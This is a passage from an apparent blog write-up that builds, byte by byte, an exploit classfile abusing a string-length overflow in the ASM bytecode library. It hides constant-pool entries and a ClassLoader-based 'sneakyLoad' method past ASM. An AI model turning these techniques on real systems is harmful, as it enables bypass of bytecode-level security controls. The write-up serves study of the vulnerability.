Now we get into the bytes for the Code attribute, where things are easier. After skipping the first eight bytes (the name index, attribute length, and max_stack value), we’re left at the high byte of the max_locals value. Luckily, max_locals is completely arbitrary, so we’ll just set it to 0500. (In this exploit, I set its partner, max_stack to 0042 since it’s also an arbitrary value.)

Next, we skip eight bytes (the low byte of max_locals, the four bytes of code_length, and the first three bytes of the bytecode, 2A 2B 2C), landing us in the middle of the bytecode. Luckily, bytecode is highly flexible in this respect. The tag byte 05 corresponds to the iconst_2 instruction in bytecode, which just pushes the integer 2 onto the operand stack. We can then follow it with a pop instruction (57), to undo it. This means that we can insert 05 57 anywhere in the middle of bytecode (as long as it isn’t the middle of a multibyte instruction). Furthermore, we can also insert nop instructions (00) anywhere to line things up better if necessary. In this case, we’ll insert one nop at the end.

Recap

We now have 0001 [this_cls] [super_cls] 0000 0000 0002 0001 [sneakyLoad_utf] [sneakyLoad_desc_utf] 0005 [Code_utf] 0000001C 0042 0500 00000010 2A 2B 2C 0557 03 2C BE 2D B6[defineClass_method] 0557 B0 00 0000 0000 $other_attrs $method2 0000

Note that code_length changed from 0000000B to 00000010 because we added five instructions (two iconst_2 pop pairs and one nop). Likewise, attribute_length grows by the same five bytes, giving 0000001C (2 + 2 + 4 + 16 + 2 + 2 = 28 bytes after the six-byte attribute header).
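Length fields like these are easy to get wrong by hand, so it can help to let a script compute them. The following Python sketch serializes a Code attribute with no exception handlers or subattributes. The `code_attribute` helper is hypothetical, and 0xAAAA and 0xCCCC are arbitrary stand-ins for the [defineClass_method] and [Code_utf] placeholders.

```python
import struct

def code_attribute(name_index, max_stack, max_locals, code):
    """Serialize a Code attribute with an empty exception table and no subattributes."""
    body = struct.pack(">HHI", max_stack, max_locals, len(code)) + code
    body += struct.pack(">HH", 0, 0)   # exception_table_length, attributes_count
    # attribute_length counts everything after the six-byte name/length header.
    return struct.pack(">HI", name_index, len(body)) + body

# Padded sneakyLoad bytecode from the recap; aaaa stands in for [defineClass_method].
padded = bytes.fromhex("2a2b2c 0557 03 2c be 2d b6 aaaa 0557 b0 00")
attr = code_attribute(0xCCCC, 0x0042, 0x0500, padded)
print(attr.hex())
```

The printed attribute carries 0000001c as attribute_length and 00000010 as code_length, agreeing with the recap.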

We also have the following constraints on the constant pool that we’ll have to satisfy later (where ** can be anything):

[super_cls] = **05
[sneakyLoad_utf] = 03**

Our exploit class is starting to take shape. So far, we have something like this, where “evilstring” is the giant null byte laden string with exact contents to be determined later, and the -s in the integer constants are placeholders to be filled in later. Note here that the integer constants contain all the bytes we just worked out except for the tag bytes themselves.

.class public Exploit
.super java/lang/Object

.method public woodlelyDoodlely : ()I
    .code stack 2000 locals 10
        ldc_w "evilstring"

        ldc2_w 0x------0001------L
        ldc2_w 0x0000000000020001L
        ldc_w  0x------00
        ldc2_w 0x----0000001C0042L
        ldc2_w 0x00000000102A2B2CL
        ldc2_w 0x57032CBE2DB6----L
        ldc2_w 0x57B0000000000000L

        iconst_0
        ireturn
    .end code
.end method
.end class

Now we can add some constants we need at the beginning that we don’t care about hiding from ASM and don’t need to be in a specific position in the constant pool:

.method public woodlelyDoodlely : ()I
    .code stack 2000 locals 10
        ldc_w "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "Code"

        ldc_w "evilstring"

        ; Longs here

        iconst_0
        ireturn
    .end code
.end method

We can assemble this class and then run it through ASM (with no bytecode transformations added) in order to see what the constant pool ordering will look like after going through ASM.

.const [1] = Utf8 Exploit 
.const [2] = Class [1] 
.const [3] = Utf8 java/lang/Object 
.const [4] = Class [3] 
.const [5] = Utf8 woodlelyDoodlely 
.const [6] = Utf8 ()I 
.const [7] = Utf8 (Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class; 
.const [8] = String [7] 
.const [9] = Utf8 Code 
.const [10] = String [9] 
.const [11] = Utf8 evilstring 
.const [12] = String [11] 

As we can see here, the two strings we just added show up at indices 7 and 9 respectively, so we can now fill in the placeholders in the previous data with [sneakyLoad_desc_utf] = 0007 and [Code_utf] = 0009.

This results in 0001 [this_cls] [super_cls] 0000 0000 0002 0001 [sneakyLoad_utf] 0007 0005 0009 0000001C 0042 0500 00000010 2A 2B 2C 0557 03 2C BE 2D B6[defineClass_method] 0557 B0 00 0000 0000 $other_attrs $method2 0000.

Tiling part 2

When we left off before, we had just tiled the code for the sneakyLoad method with Long constants, carefully finding places to put the tag bytes. However, we had to set the method attribute count to 5, meaning that we need to add four extra dummy attributes. Now, we’ll cover that, as well as tiling the second method (<init>) and everything else.

Recall that an attribute can have any name, and attributes with names that aren’t on the list of standard attributes defined in the classfile format are just ignored by the JVM. Therefore, we can use any name except Code for our extra attributes, and put whatever data we want into them. Since woodlelyDoodlely is conveniently at constant pool index 0005, we’ll use that for all our attribute names.

The last constant we added previously was ldc2_w 0x57B0000000000000L. This covers the pop, the return instruction (B0), an extra nop (00), then the four bytes for the exception table count and attribute count of the Code attribute. Finally, there’s one byte left over, the high byte of the name index for the following attribute.

Next comes a tag byte (05), which makes the name index of the second attribute 0005. That’s convenient, since we decided to name all our attributes woodlelyDoodlely.

After the name index comes the attribute length field, followed by the attribute data, where we can put whatever we want. We’ll make the custom attributes three bytes long each, so that each one (two bytes of name index, four bytes of length, three bytes of data) takes up exactly nine bytes and the next tag byte lines up with the 05 in the following attribute’s name index. The attribute data is arbitrary, so I just chose AAAAAA, BBBBBB, CCCCCC, etc. so they’re easy to tell apart. For the final custom attribute, however, we’ll make it six bytes instead of three in order to line up the tag bytes for when we tackle the second method, which comes right afterwards.

Therefore, the five attributes of the sneakyLoad method have the following contents:

attr1 (Code) = 0042 0500 00000010 2A 2B 2C 0557 03 2C BE 2D B6[defineClass_method] 0557 B0 00 0000 0000
attr2 (wD) = AAAAAA
attr3 (wD) = BBBBBB
attr4 (wD) = CCCCCC
attr5 (wD) = DDDDDD DD 05 00

and the bytes for the sneakyLoad method as a whole are now

0001 [sneakyLoad_utf] 0007 0005
0009 0000001C 0042 0500 00000010 2A 2B 2C 0557 03 2C BE 2D B6[defineClass_method] 0557 B0 00 0000 0000
0005 00000003 AAAAAA
0005 00000003 BBBBBB
0005 00000003 CCCCCC
0005 00000006 DDDDDD DD 05 00

Now, we can use a similar process for the second method, although things are easier this time around, because we have more flexibility over the start due to being preceded by the custom attribute at the end of the first method. In fact, we put a tag byte second to last inside that custom attribute, meaning we can skip right over the first seven bytes of the second method (covering access_flags, name_index, descriptor_index, and the high byte of attributes_count.)

We’re now at the low byte of the attribute count for <init>, which needs to be a tag byte, so we’ll once again give it an attribute count of 5, just like the first method. In fact, we’re now in the exact same position as we were in the first method, so the tag bytes after this will end up in the same position as well.

Next comes the name and attribute length for the Code attribute. Recall that our goal for the injected bytecode looks like this:

.method public sneakyLoad : (Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;
    .code stack 99 locals 99
        aload_0
        aload_1
        aload_2
        iconst_0
        aload_2
        arraylength
        aload_3
        invokevirtual Method Exploit defineClass (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;
        areturn
    .end code
.end method

.method public <init> : ()V
    .code stack 99 locals 99
        aload_0
        invokespecial Method java/lang/ClassLoader <init> ()V
        return
    .end code
.end method

For sneakyLoad, we had 9 instructions and 11 bytes of bytecode (prior to adding the iconst_2 pops and nop, which bumped it up to 16 bytes of bytecode). For <init>, we only have 3 instructions and 5 bytes of bytecode (aload_0 invokespecial return), since the constructor is much simpler.

However, as it turns out, we’ll end up adding so many nops to this method’s bytecode in order to line up the tag bytes conveniently, that we’ll end up with 16 bytes of bytecode again anyway, which means that the final code length and attribute length will be the same as the previous method (00000010 and 0000001C respectively).

In fact, there’s a minor gotcha here: recall that ASM deduplicates identical constants. If it sees an ldc instruction pointing to a constant that is the same as one it has already allocated in the constant pool, it will just reuse the old one instead of allocating a new constant. This means that every constant we inject has to be distinct. If we just did things the same way as before, we’d end up with an identical constant covering the beginning of the Code attribute for the two methods, so we’ll set max_stack to 0043 here instead of 0042 to keep them distinct.

Now comes the bytecode for the <init> method. Before we add anything, we just have five bytes: 2A B7[CL_init_method] B1. However, we’ll add a bunch of nop instructions (00 bytes) to line things up the same way as before, along with the two iconst_2 pop pairs (05 57) to cover the two tag bytes like before. This gives us a final bytecode of 2A 00 00 0557 B7[CL_init_method] B1 00 00 00 0557 00 00.

Then we once again set the exception table length and subattribute count to 0, and add custom attributes to the method like before, giving us the following:

attr1 (Code) = 0043 0500 00000010 2A 00 00 0557 B7[CL_init_method] B1 00 00 00 0557 00 00 0000 0000
attr2 (wD) = AAAAAA
attr3 (wD) = BBBBBB
attr4 (wD) = CCCCCC
attr5 (wD) = DDDDDD DD 05 00

However, this won’t actually work. First off, since ASM merges identical constants, we can’t reuse the attribute values, so we’ll use 666666, 777777, etc. instead of AAAAAA, BBBBBB, etc. this time.

Second, we need to do something tricky with the final custom attribute. So far, we’ve used a bunch of Long constants to inject all the bytes that will become our malicious classfile when parsed by the JVM following the string overflow. However, this is all just part of the constant pool from ASM’s perspective. ASM will continue writing out the rest of the classfile, such as the woodlelyDoodlely method and all the bytecode for all those ldc instructions that we used to cause ASM to write out the constants.

Since a classfile isn’t allowed to contain extra data at the end, we need some way to “comment out” all of this extra junk at the end to prevent the JVM from rejecting the overflown classfile. Luckily, since custom attributes can contain arbitrarily long amounts of arbitrary binary data, we can just comment it all out by making it part of the custom attribute content from the JVM’s perspective.

For example, if we set the attribute length to 100, but only provided 5 bytes of actual data, the JVM parser would include the following 95 bytes as part of that attribute’s data and thus ignore it. Therefore, instead of setting the length of the final woodlelyDoodlely attribute to 6 bytes here like we did for the first method, we instead need to wait until we’ve finished crafting the entire classfile, then run it through ASM and see how many extra bytes of stuff got added afterwards, and then adjust the attribute length here appropriately. (Spoiler alert: The answer is 00000E25.)
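To make the "commenting out" trick concrete, here is a minimal Python 3 sketch of how a parser walks attribute_info structures. It is not the JVM's actual parser; parse_attributes and the sample bytes are invented for illustration, and the only assumption is the standard layout of a two-byte name index, a four-byte length, then that many bytes of data.

```python
import struct

def parse_attributes(data, offset, count):
    """Parse `count` attribute_info structures starting at `offset`.

    Returns ([(name_index, body), ...], offset_after_last_attribute).
    """
    attrs = []
    for _ in range(count):
        name_index, length = struct.unpack_from(">HI", data, offset)
        offset += 6
        body = data[offset:offset + length]
        if len(body) != length:
            raise ValueError("attribute runs past the end of the data")
        attrs.append((name_index, body))
        offset += length
    return attrs, offset

real = bytes.fromhex("9999999999")   # the 5 bytes we actually "meant" to supply
junk = bytes(range(95))              # stand-in for whatever follows in the file
tail = bytes.fromhex("0000")         # trailing bytes that must stay visible

# Name index 0005, declared length 100, even though only 5 bytes are "ours".
blob = struct.pack(">HI", 5, 100) + real + junk + tail

attrs, end = parse_attributes(blob, 0, 1)
print(len(attrs[0][1]))   # size of the attribute body as the parser sees it
print(blob[end:].hex())   # what is left for the rest of the classfile
```

The parser never looks inside the body of an attribute it doesn't recognize, so the 95 junk bytes simply disappear into it, and parsing resumes at the trailing 0000.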

Therefore, the final contents of our attributes for the second method are as follows:

attr1 (Code) = 0043 0500 00000010 2A 00 00 0557 B7[CL_init_method] B1 00 00 00 0557 00 00 0000 0000
attr2 (wD) = 666666
attr3 (wD) = 777777
attr4 (wD) = 888888
attr5 (wD) = 999999 99   (bunch of ASM junk is included from the JVM's perspective here)

And the final bytes for the <init> method as a whole are

0001 [init_utf] [init_desc_utf] 0005
0009 0000001C 0043 0500 00000010 2A 00 00 0557 B7[CL_init_method] B1 00 00 00 0557 00 00 0000 0000
0005 00000003 666666
0005 00000003 777777
0005 00000003 888888
0005 00000E25 999999 99

This leads to the following bytes we need to inject for the post-constant pool parts of the classfile as a whole:


0001
[this_cls]
[super_cls]
0000
0000
0002

0001 [sneakyLoad_utf] 0007 0005
0009 0000001C 0042 0500 00000010 2A 2B 2C 0557 03 2C BE 2D B6[defineClass_method] 0557 B0 00 0000 0000
0005 00000003 AAAAAA
0005 00000003 BBBBBB
0005 00000003 CCCCCC
0005 00000006 DDDDDD DD 05 00

0001 [init_utf] [init_desc_utf] 0005
0009 0000001C 0043 0500 00000010 2A 00 00 0557 B7[CL_init_method] B1 00 00 00 0557 00 00 0000 0000
0005 00000003 666666
0005 00000003 777777
0005 00000003 888888
0005 00000E25 999999 99

Note that we no longer include the attributes_count of 0000 at the end of the classfile since our input classfile also contains no class attributes, so ASM will write that out at the end as well. Instead of trying to inject it ourselves (which wouldn’t work anyway), we merely have to not comment out the final two bytes of ASM’s output.

This brings us to the following code, where - are placeholders for values to be filled in later:

.method public woodlelyDoodlely : ()I
    .code stack 2000 locals 10
        ldc_w "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "Code"

        ldc_w "evilstring"

        ldc2_w 0x------0001------L
        ldc2_w 0x0000000000020001L
        ldc_w  0x--000700
        ldc2_w 0x00090000001C0042L
        ldc2_w 0x00000000102A2B2CL
        ldc2_w 0x57032CBE2DB6----L
        ldc2_w 0x57B0000000000000L
        ldc2_w 0x00000003AAAAAA00L
        ldc2_w 0x00000003BBBBBB00L
        ldc2_w 0x00000003CCCCCC00L
        ldc2_w 0x00000006DDDDDDDDL
        ldc2_w 0x000001--------00L
        ldc2_w 0x00090000001C0043L
        ldc2_w 0x00000000102A0000L
        ldc2_w 0x57B7----B1000000L
        ldc2_w 0x5700000000000000L
        ldc2_w 0x0000000366666600L
        ldc2_w 0x0000000377777700L
        ldc2_w 0x0000000388888800L
        ldc2_w 0x00000E2599999999L

        iconst_0
        ireturn
    .end code
.end method

Next up, we have to fill in those placeholders and construct the real value for evilstring. Additionally, we have to satisfy the following constraints while doing so:

[super_cls] = **05
[sneakyLoad_utf] = 03**

More constants

Now we can add in some more strings that we need, to help fill the placeholders:

        ldc_w "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "Code"
        
        ldc_w "defineClass"
        ldc_w "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "<init>"
        ldc_w "()V"
        ldc_w "java/lang/ClassLoader"

        ldc_w "evilstring"

However, unlike the first two strings we added ("Code" and "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"), we need the new constants to appear at index 257 or higher for reasons that will become clear later. Therefore, we need to first insert a bunch of dummy constants we aren’t using in order to push "defineClass", etc. up to index 257.

        ldc_w "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "Code"
        
        ldc_w "s_b"
        ldc_w "s_d"
        ldc_w "s_f"
        ldc_w "s_11"
        ldc_w "s_13"
        ...
        ldc_w "s_fb"
        ldc_w "s_fd"
        ldc_w "s_ff"

        ldc_w "defineClass"
        ldc_w "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "<init>"
        ldc_w "()V"
        ldc_w "java/lang/ClassLoader"

        ldc_w "evilstring"

In order to make things easier to understand, we’ll name the dummy strings s_addr where addr is the index where the corresponding Utf8 constant will appear in hexadecimal. Therefore s_b appears at index 11 (b in hex), s_ff appears at index 255 (ff in hex), etc.

We need to add a total of 123 strings here in order to push "defineClass" up to index 257. Recall that each string literal results in two constant pool entries, one Utf8 constant and one String constant that points to it. Therefore the ldc_w "s_ff" line will cause ASM to output a Utf8 constant at index 255 and a String constant at index 256 pointing to it. Therefore, the next line ldc_w "defineClass" results in a Utf8 constant for "defineClass" at index 257, just like we wanted. (It also results in a String constant at index 258, but we don’t care about the Strings, just the Utf8 constants.)
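Nobody wants to type 123 dummy strings by hand, so the list can be generated. The following Python 3 sketch assumes, as in the ASM dump shown earlier, that the first free constant pool index after "Code" is 11 (0x0B) and that every string literal uses up two consecutive indices; the variable names are made up for illustration.

```python
# Utf8 indices of the dummy strings: 0x0B, 0x0D, ..., 0xFF.
# The String entry for each literal takes the index right after its Utf8.
dummy_names = ["s_%x" % index for index in range(0x0B, 0x100, 2)]

# The "real" string literals that follow the dummies, in source order.
named = [
    "defineClass",
    "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;",
    "<init>",
    "()V",
    "java/lang/ClassLoader",
    "evilstring",
]

first_named_index = 0x0B + 2 * len(dummy_names)
utf8_index = {name: first_named_index + 2 * i for i, name in enumerate(named)}

# Emit the assembly lines for the dummies.
for name in dummy_names:
    print('        ldc_w "%s"' % name)

# Show where each real Utf8 constant ends up (in ASM's view).
for name in named:
    print("%04X  %s" % (utf8_index[name], name))
```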

With these strings added, we can fill in two additional placeholders: [init_utf] = 0105 and [init_desc_utf] = 0107. The other three strings are constants we’ll need later when we work on evilstring itself.

        ldc2_w 0x------0001------L
        ldc2_w 0x0000000000020001L
        ldc_w  0x--000700
        ldc2_w 0x00090000001C0042L
        ldc2_w 0x00000000102A2B2CL
        ldc2_w 0x57032CBE2DB6----L
        ldc2_w 0x57B0000000000000L
        ldc2_w 0x00000003AAAAAA00L
        ldc2_w 0x00000003BBBBBB00L
        ldc2_w 0x00000003CCCCCC00L
        ldc2_w 0x00000006DDDDDDDDL
        ldc2_w 0x0000010105010700L
        ldc2_w 0x00090000001C0043L
        ldc2_w 0x00000000102A0000L
        ldc2_w 0x57B7----B1000000L
        ldc2_w 0x5700000000000000L
        ldc2_w 0x0000000366666600L
        ldc2_w 0x0000000377777700L
        ldc2_w 0x0000000388888800L
        ldc2_w 0x00000E2599999999L

The hidden constant pool

The main purpose of evilstring is to contain enough null bytes to overflow the length calculation, thus triggering the whole vulnerability in the first place. However, we’ll also take the opportunity to inject some constant pool entries that we don’t want ASM to see.

Recall that when using constant pool entries to set up the bytes that will be re-interpreted as our exploit code post-overflow, the two useful types of constants are Long, which holds arbitrary data but requires a tag byte every 9th byte, and Utf8, which can hold arbitrarily long amounts of data with no tag bytes, but which can’t contain any null bytes. We decided to use Long constants (plus one Int constant) to inject the method definitions, bytecode, etc. However, we’ll use a Utf8 constant (evilstring itself) to inject the constant pool, or rather the parts of the constant pool that we can’t let ASM see (the other parts we can just add as normal constants, as was done above).

There are three constants referenced from elsewhere in the bytecode that we have to hide from ASM in order to avoid potential meddling:

Class java/lang/ClassLoader, which will be our new superclass
Method Exploit defineClass (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;, the actual method to load classes
Method java/lang/ClassLoader <init> ()V, the superclass constructor we call in our own constructor

As mentioned previously, Class constants do not store the name of the class directly. Instead, they point to a Utf8 constant which stores this. The same is true for Method constants. Method constants actually point to a whole tree of other constants.

A Method constant points to a Class constant representing the class containing the method and a NameAndType constant representing the name and descriptor of the method. The NameAndType constant in turn points to two Utf8 constants storing the name and descriptor of the method respectively. This means that we need a bunch of hidden constant pool entries like the following:

.const [defineClass_method] = Method [this_cls] [defineClass_nat]
.const [this_cls] = Class [this_utf]
.const [this_utf] = Utf8 "Exploit"
.const [defineClass_nat] = NameAndType [defineClass_utf] [defineClass_desc_utf]

.const [CL_init_method] = Method [super_cls] [CL_init_nat]
.const [CL_init_nat] = NameAndType [init_utf] [init_desc_utf]
.const [super_cls] = Class [super_utf]

We’ll start from the bottom up with [this_cls] and [this_utf]. [this_cls] is a Class constant for the very class we’re defining, i.e. Exploit. At first glance, this might seem unnecessary. In fact, there already is such a constant in the constant pool - it’s the very first constant ASM adds to any class!

However, there’s an issue here. All the hidden constants we’re creating here are injected as part of the content of a giant Utf8 constant in ASM’s view (the one we call evilstring). However, the content of a Utf8 constant is MUTF-8 encoded string data, which means it can’t contain null bytes. The existing copy of [this_cls] is at index 0002, since it’s the very first thing ASM adds to the constant pool (index 0001 is the Utf8 name of the class which the Class at index 0002 points to).

This means that in order to reference [this_cls] from hidden constants, we have to put it at index 0101 (257 in decimal) or higher. Since it already exists at index 2 and ASM merges duplicate constants, it’s impossible to get ASM to ever do this. Therefore, we have to create our own, hidden, version of [this_cls], even though one already exists.

It gets worse: In order to make [this_cls] a hidden constant, the constants it points to also need to be at index 257 or higher, which means we need to make another hidden copy for the underlying Utf8 constant (referred to as [this_utf] above).

Even worse, since [this_utf] is now a hidden constant, its own data can’t contain any null bytes either, including the length field of the encoded string data. This means that we have to rename our class to something that is at least 257 bytes long. So bye, bye, Exploit and hello Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.

Now we have the bytes for our first hidden constant: a tag byte (01), then length field (257 = 0101), then the string data. We’ll use a Python script to construct the actual value of evilstring, so we can just write '010101'.decode('hex') + 'Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'.

Hidden constants part 2

Recall that our code so far looks like this:

        ldc_w "s_fb"
        ldc_w "s_fd"
        ldc_w "s_ff"

        ldc_w "defineClass"
        ldc_w "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "<init>"
        ldc_w "()V"
        ldc_w "java/lang/ClassLoader"

        ldc_w "evilstring"

The Utf8 for "s_ff" appears at index 00ff, so "defineClass" appears at 0101, "(Ljava/lang/String;[BII..." appears at 0103, "<init>" at 0105, "()V" at 0107, "java/lang/ClassLoader" at 0109 and "evilstring" itself appears at 010B. (Recall that it counts up by two each time because each string literal results in both a Utf8 constant and a String constant.)

However, that’s all according to ASM’s view. ASM thinks that it’s writing out one giant Utf8 constant for evilstring at index 010B, but when it does, the string length overflows to 0, so the JVM continues parsing from inside evilstring, etc. Therefore the JVM sees a 0-length Utf8 constant at index 010B, and thus the first hidden constant we create ([this_utf]) actually appears at index 010C.

With that out of the way, we can proceed to the next hidden constant, [this_cls] itself. This is just a tag byte (07) followed by the index of [this_utf] (010C). In fact, we can now fill in the rest of the hidden constants too. (The tag bytes for Method and NameAndType constants are 0A and 0C respectively.)

.const [this_utf] = Utf8 "Exploit"
010C: 01 0101 ... 

.const [this_cls] = Class [this_utf]
010D: 07 010C

.const [defineClass_nat] = NameAndType [defineClass_utf] [defineClass_desc_utf]
010E: 0C 0101 0103

.const [defineClass_method] = Method [this_cls] [defineClass_nat]
010F: 0A 010D 010E

.const [CL_init_nat] = NameAndType [init_utf] [init_desc_utf]
0110: 0C 0105 0107

.const [CL_init_method] = Method [super_cls] [CL_init_nat]
0111: 0A [super_cls] 0110

There are two things to note here. First, we couldn’t define [super_cls] yet and had to leave it as a placeholder, since the bytecode we wrote previously requires its index to end in 05. Second, [defineClass_utf], [defineClass_desc_utf], etc. are not hidden constants. We defined them previously using ordinary string literal ldcs. However, they are referenced by hidden constants and thus have to appear at index 0101 or higher, which is why we had to add all those dummy strings before them earlier.

This leads to the following Python code to construct the hidden constants we’ve defined so far, where ---- is a placeholder to be filled in with [super_cls] later.

s = '010101'.decode('hex') + 'Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
s += '07010C0C010101030A010D010E0C010501070A----0110'.decode('hex')

Next comes [super_cls]. The next available index that ends in 05 is 0205, but we’re currently at index 0112, so we’ll have to add a bunch of dummy constants again to fill up the space. Luckily, since we’re creating the hidden constants directly rather than going through ASM, we don’t have to worry about duplicates, and can just repeat the same constant over and over. Specifically, we’ll just use the byte pattern 03 01010101, which corresponds to the int constant Int 0x01010101.

s += '0301010101'.decode('hex') * (0x205 - 0x112)

Now we can define [super_cls], which is just 07 0109, and also fill in the earlier placeholders with its index (0205). This brings us to

s = '010101'.decode('hex') + 'Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
s += '07010C0C010101030A010D010E0C010501070A02050110'.decode('hex')
s += '0301010101'.decode('hex') * (0x205 - 0x112)
s += '070109'.decode('hex')
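The hex strings above are easy to mistype, so here is an alternative Python 3 sketch that builds the same entries from their fields with struct. The helper names are invented for illustration, and the class name is assumed to be "Exploit/" padded with x to exactly 257 bytes.

```python
import struct

def utf8_entry(text):
    data = text.encode("ascii")
    return struct.pack(">BH", 1, len(data)) + data      # tag 01, u2 length, bytes

def class_entry(name_index):
    return struct.pack(">BH", 7, name_index)            # tag 07

def name_and_type_entry(name_index, desc_index):
    return struct.pack(">BHH", 12, name_index, desc_index)   # tag 0C

def methodref_entry(class_index, nat_index):
    return struct.pack(">BHH", 10, class_index, nat_index)   # tag 0A

INT_DUMMY = struct.pack(">BI", 3, 0x01010101)            # tag 03, filler constant

FIRST_HIDDEN_INDEX = 0x010C   # the JVM sees the empty Utf8 at 0x010B first

pool = [
    utf8_entry("Exploit/".ljust(257, "x")),      # 010C [this_utf]
    class_entry(0x010C),                         # 010D [this_cls]
    name_and_type_entry(0x0101, 0x0103),         # 010E [defineClass_nat]
    methodref_entry(0x010D, 0x010E),             # 010F [defineClass_method]
    name_and_type_entry(0x0105, 0x0107),         # 0110 [CL_init_nat]
    methodref_entry(0x0205, 0x0110),             # 0111 [CL_init_method]
]
pool += [INT_DUMMY] * (0x205 - 0x112)            # 0112 .. 0204
pool.append(class_entry(0x0109))                 # 0205 [super_cls]

super_cls_index = FIRST_HIDDEN_INDEX + len(pool) - 1
s = b"".join(pool)

print("%04X" % super_cls_index)
print(s[260:283].hex().upper())   # the five small entries right after [this_utf]
```

Counting list entries instead of bytes makes it harder to get the index of [super_cls] wrong, which matters because the tiled bytecode depends on it ending in 05.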

What next? Recall that the bytecode we wrote earlier had two constraints on the constant pool:

[super_cls] = **05
[sneakyLoad_utf] = 03**

We already solved the first one, but still have to deal with the second. Therefore, we’ll skip ahead to the first compatible index (0300):

s += '0301010101'.decode('hex') * (0x300 - 0x206)

And define [sneakyLoad_utf] there. Note that for the same reasons as before, it needs to be at least 257 bytes long, so we have to rename sneakyLoad to sneakyLoad_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________.

s += '010101'.decode('hex') + 'sneakyLoad'.ljust(257, '_')

After [sneakyLoad_utf], we add one more instance of the dummy constant 03 01010101. It’s a leftover from a previous design: while recreating this exploit for the blog post, I initially made a miscalculation, and taking the extra constant out now would be far too much hassle, since it would mean recalculating all the offsets.

Finally, it’s time to do some overflowing!

Putting the “evil” in “evilstring”

Now that we’ve set up all the hidden constant pool entries, we need to fill the rest of the string with null bytes in order to actually trigger the overflow bug. Of course, we can’t just put in null bytes; we have to wrap them in a Utf8 constant so the JVM will be happy when parsing the hidden constant pool (recall that ASM will re-encode the null bytes as the proper C0 80 encoding, so the JVM will see the correct MUTF-8 encoding here).

Now, how many null bytes do we need? We want the encoded length of the string to be exactly 65536. So far, we’ve defined 3016 bytes worth of hidden constant pool entries, which combined with the three bytes for the final wrapper Utf8, means we need the rest of the string to have an encoded length of 65536 - 3019 = 62517. That’s an odd number, so we’ll include one non-null byte and 62516//2 = 31258 literal null bytes.

Unicode blues

So we’re done, right? Not so fast. The problem is that the wrapper Utf8 is part of the hidden constant pool seen by the JVM, which means that its length field needs to hold the length after ASM converts all the null bytes to the proper two-byte encoding. This gives a length of 1 + 31258*2 = 62517, or F435 in hex.

But wait! The hidden constants are all embedded within evilstring, which means they have to be valid MUTF-8 encoded data. We’ve dealt with the main restriction (no null bytes) at length before. However, there’s another restriction: all bytes have to be part of a valid Unicode sequence. Luckily, MUTF-8 encodes all bytes 01-7F as themselves, so we can use whatever data we want as long as the bytes are in that range. However, bytes above 7F must be part of multi-byte encodings for non-ASCII characters. This means that the F4 byte up there is invalid MUTF-8.

The solution is to use not one but two wrapper Utf8 constants and divide up the null bytes between them so that both bytes of each length field stay in the 01-7F range (which, in particular, means neither length can exceed 7F7F).
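A quick way to test candidate lengths is to check each byte of the two-byte length field separately. This is a sketch under the assumption that we only ever use the single-byte range 01-7F and never try to smuggle length bytes in as part of a multi-byte sequence; length_bytes_ok is a made-up name.

```python
def length_bytes_ok(length):
    """True if both bytes of a u2 length are in the single-byte range 01-7F."""
    high, low = divmod(length, 0x100)
    return all(0x01 <= b <= 0x7F for b in (high, low))

single_wrapper = 1 + 31258 * 2   # the length a lone wrapper Utf8 would need

for length in (single_wrapper, 0x7F7F, 0x7A80, 0x0101):
    verdict = "ok" if length_bytes_ok(length) else "invalid"
    print("%04X %s" % (length, verdict))
```

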